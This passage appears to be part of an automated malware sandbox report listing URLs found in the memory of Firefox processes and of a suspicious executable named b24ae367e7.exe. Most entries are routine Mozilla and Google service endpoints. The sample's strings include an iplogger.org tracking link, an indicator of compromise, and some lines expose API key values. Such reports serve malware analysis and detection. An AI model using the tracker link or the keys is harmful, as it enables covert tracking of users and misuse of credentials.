Source: firefox.exe, 00000021.00000003.2968260213.00000273B1D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D7C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000021.00000003.2970660238.00000273AB1A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000021.00000003.2910210529.00000273A8A1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3000439742.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2964616454.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014908538.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2948224150.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://install.mozilla.org
Source: b24ae367e7.exe, 0000000F.00000003.3114063864.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3111629929.0000000005624000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3111049300.000000000595F000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3111193928.0000000005681000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3112458459.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3112946723.0000000005A31000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3111829869.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3112298391.000000000595F000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3113083958.000000000595F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1Pz8p7
Source: firefox.exe, 00000021.00000002.3144749087.00000273A7803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2019-09/schema.
Source: firefox.exe, 00000021.00000002.3144749087.00000273A7803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2019-09/schema./
Source: firefox.exe, 00000021.00000002.3144749087.00000273A7803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2020-12/schema/
Source: firefox.exe, 00000021.00000002.3144749087.00000273A7803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
Source: firefox.exe, 00000021.00000003.2910210529.00000273A8A1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3000439742.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2964616454.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014908538.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2948224150.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000021.00000003.2910210529.00000273A8A1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3000439742.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2964616454.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014908538.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2948224150.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000021.00000003.2910210529.00000273A8A1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3000439742.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2964616454.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014908538.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2948224150.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000021.00000003.2896632680.00000273A8144000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000021.00000003.2896632680.00000273A8144000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000021.00000003.2970660238.00000273AB156000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000021.00000003.2970660238.00000273AB178000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970660238.00000273AB156000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000021.00000003.2830312173.00000273A6D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3105277065.00000273A6D2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2832497554.00000273A6D29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014202027.00000273A6D2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000021.00000003.2830312173.00000273A6D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3071561783.00000273A377D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3105277065.00000273A6D2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2832497554.00000273A6D29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014202027.00000273A6D2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%sresource://gre/modules/URIFixup.sys.mjs
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttps://mail.inbox.lv/compose?to=%shttps://poczta.interia.pl/
Source: firefox.exe, 00000021.00000002.3052932070.00000273978D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3029399801.000001F80C072000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D7EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mozilla-hub.atlassian.net/browse/SDK-405
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mozilla-hub.atlassian.net/browse/SDK-405https://aus5.mozilla.org/update/6/Firefox/118.0.1/20
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ok.ru/
Source: firefox.exe, 00000021.00000003.2830312173.00000273A6D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3105277065.00000273A6D2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2832497554.00000273A6D29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014202027.00000273A6D2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%sresource://gre/modules/PrivateBrowsingUtils.s
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000021.00000003.2830312173.00000273A6D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3071561783.00000273A377D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3105277065.00000273A6D2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2832497554.00000273A6D29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014202027.00000273A6D2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s_finalizeInternal/this._finalizePromise
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000021.00000002.3117423430.00000273A73A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://push.services.mozilla.com/
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000021.00000002.3052932070.000002739786B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2&
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000021.00000002.3052932070.000002739786B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000021.00000002.3052932070.000002739786B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000021.00000003.2827663613.00000273A7577000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3105017765.00000273A6C70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com//shims/google-safeframe.html
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.comtestPermissionFromPrincipalmaybeShowOnboardingDialogchrome://browser/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2Deferred
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/play.svgresource://gre/modules/addons/XPIProvider.jsm
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000021.00000002.3097416157.00000273A51EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2968260213.00000273B1D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D712000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/
